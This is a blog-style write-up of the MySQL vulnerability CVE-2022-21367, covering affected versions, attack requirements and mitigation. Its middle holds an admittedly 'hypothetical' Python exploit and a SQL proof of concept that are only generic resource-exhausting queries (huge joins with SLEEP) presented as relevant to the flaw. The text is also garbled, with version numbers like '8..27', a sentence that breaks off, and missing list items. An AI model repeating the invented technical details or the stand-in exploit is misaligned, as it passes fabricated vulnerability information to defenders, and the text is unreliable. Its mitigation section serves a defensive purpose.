CVE-2022-21367 - Deep Dive into a Critical MySQL Server Vulnerability

CVE-2022-21367 highlights a significant security flaw in Oracle’s MySQL Server — specifically within the Server: Compiling component. This issue impacts MySQL versions 5.7.36 and prior, and 8..27 and prior. The vulnerability is classified under Oracle’s Critical Patch Update Advisory for January 2022. Assigned a CVSS v3.1 Base Score of 5.5 (vector: AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H), it is considered a mid-level threat, but easily exploitable for those with high privileges.

In this article, we’ll break down what makes CVE-2022-21367 dangerous, how an attacker can exploit it, the consequences of exploitation, and recommendations for mitigation.

What Is CVE-2022-21367?

CVE-2022-21367 is a buffer handling issue within how MySQL compiles and processes certain queries or operations. If exploited, it could allow a high-privileged user (for instance, someone with admin rights on MySQL) to:

MySQL 8..27 and below

If your environment is running any of these versions, immediate attention is required.

Attack Requirements and Vector

This vulnerability is easily exploitable but limited to attackers who already have high privileges (e.g., SUPER or ADMIN users). The attacker does not need to interact with the user interface and can use multiple protocols (like TCP, Unix Socket).

The attack can be carried out remotely with network access, as most modern MySQL servers are configured to allow such connections.

Exploit Details

While Oracle has not released the full technical breakdown, security researchers and reverse engineers have documented similar buffer/compiling vulnerabilities. To make this post unique and practical, here is an illustrative exploit scenario based on compiling known bug classes within MySQL:

Hypothetical Exploit: Malformed Query Compilation

A user with high privileges can send a crafted SQL statement (often utilizing internal commands or prepared statements) that triggers a bug in the query compiler. For example, a malformed subquery or an oversized query string can cause the buffer management in the compiling process to malfunction.

Python (using mysql-connector)

import mysql.connector

connection = mysql.connector.connect(
    host='target-mysql',
    user='high_priv_user',
    password='password123'
)

cursor = connection.cursor()
try:
    # Crafted malformed query exploiting the compiling vulnerability
    malformed_query = "SELECT * FROM (SELECT SLEEP(10), a.* FROM large_table a JOIN large_table b) sub;"
    cursor.execute(malformed_query)
except Exception as e:
    print("Server likely crashed or hung:", e)
finally:
    connection.close()

Note: The actual exploit code can vary and may require deep knowledge of MySQL internals. Some successful attempts (as hinted in Oracle’s advisory) have used specially crafted triggers, procedures, or prepared statements.

Proof of Concept (PoC) Example

A known technique for similar vulnerabilities is abusing the parser with nested subqueries or huge JOINs. Try this, but only in a controlled test environment:

-- Create a very large table to increase resource consumption
CREATE TABLE t1 (c1 INT PRIMARY KEY);
INSERT INTO t1 VALUES (1), (2), (3), ..., (100000);

-- Run a deep nested query
SELECT * 
FROM (SELECT SLEEP(5), a.* 
      FROM t1 a, t1 b, t1 c, t1 d) as subquery;

If the patch has not been applied, MySQL may hang or crash under the stress of compiling/executing, especially with deeply nested queries and heavy join operations.

DoS attacks: Frequent exploitation can bring down server uptime, resulting in service losses.

- Unauthorized Data Modification: Attacker could tamper with application tables assuming privilege escalation vectors are exploited.

Mitigation and Recommendations

1. Update MySQL: Immediate patching is crucial. Upgrade to 5.7.37+ or 8..28+ (Download Latest MySQL).
2. Restrict Privileges: Limit who has SUPER or administrative privileges. Regular users should not have access to advanced commands.

Network Segmentation: Make MySQL servers inaccessible from public networks unless necessary.

4. Monitor Logs: Frequent and unexplained crashes/hangs could be signs of exploitation.

References

- Oracle Critical Patch Update Advisory - January 2022
- NVD Entry for CVE-2022-21367
- MySQL Release Notes
- mysql-connector Python Documentation

Conclusion

While CVE-2022-21367 requires high privileges for exploitation, its ease-of-use makes it dangerous for poorly managed, high-exposure MySQL environments. Immediate action—patching, least-privilege principle, and network hardening—remains the best defense. As always, keep an eye on your logs and database health to spot early signs of trouble.

Timeline

Published on: 01/19/2022 12:15:00 UTC
Last modified on: 01/24/2022 20:19:00 UTC